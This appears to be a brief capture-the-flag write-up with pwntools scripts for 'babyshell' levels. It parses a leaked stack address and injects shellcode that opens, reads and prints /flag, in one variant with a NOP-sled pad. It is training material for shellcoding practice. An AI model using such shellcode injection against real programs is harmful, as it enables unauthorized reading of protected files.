1

from pwn import *
context.log_level='info'

r = process("/challenge/babyshell_level1")

r.recvuntil("[LEAK] Placing shellcode on the stack at 0x")
addr = int(r.recvline()[:-2], 16)
log.success("addr => {}".format(hex(addr)))

shellcode = shellcraft.amd64.open("/flag")
shellcode+= shellcraft.amd64.read('rax', addr+0x100, 0x100)
shellcode+= shellcraft.amd64.write(1, addr+0x100, 0x100)

payload = asm(shellcode, arch='amd64')

r.recv()
r.sendline(payload)
r.interactive()

2

payload = asm(shellcode, arch='amd64').rjust(0x900, b'\x90')

Q.E.D.


来都来了,点个广告再走吧(=・ω・=)